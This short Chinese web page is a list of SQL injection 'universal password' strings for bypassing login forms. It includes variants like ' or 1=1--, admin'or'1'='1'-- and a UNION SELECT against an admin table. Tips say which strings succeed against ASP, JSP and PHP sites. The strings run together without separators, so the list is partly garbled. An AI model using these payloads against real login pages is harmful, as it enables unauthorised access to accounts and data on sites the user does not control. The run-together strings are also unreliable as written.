各种利用形式如下:
'or'='or''or''=''or ''='" or "a"="a"or "a"="a"or 1=1--"or 1=1%00"or"="a'='a"or=or"') or ('a'='a')or('a'='a1 or '1'='1' or 1=11 or '1'='1'=11'or'1'='1admin' or 'a'='a 密码随便admin'or'1'='1'--admin' or '1'='1'--a'or' 1=1--a 'or' 1=1--or 1=1--'or 1=1--'or' '1'='1or 1=1-- ''OR 1=1%00or 'a'='a'or'='1''or''=''or''='' or ''=''or''=''or'1'='1' or '1'='1'or'a'='a' or 'a'='a'xor用户名: ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)密码: 1
特殊说明:
1.admin ' or ' membership/login.asp(国外某程序)
2.admin 1'or'1'='1 用于jsp程序,如果管理员有admin这个用户,有一定成功率。
3.存在字符型注入的php网站是可以用万能密码' or 1=1/*的(某文章提到过)
联系客服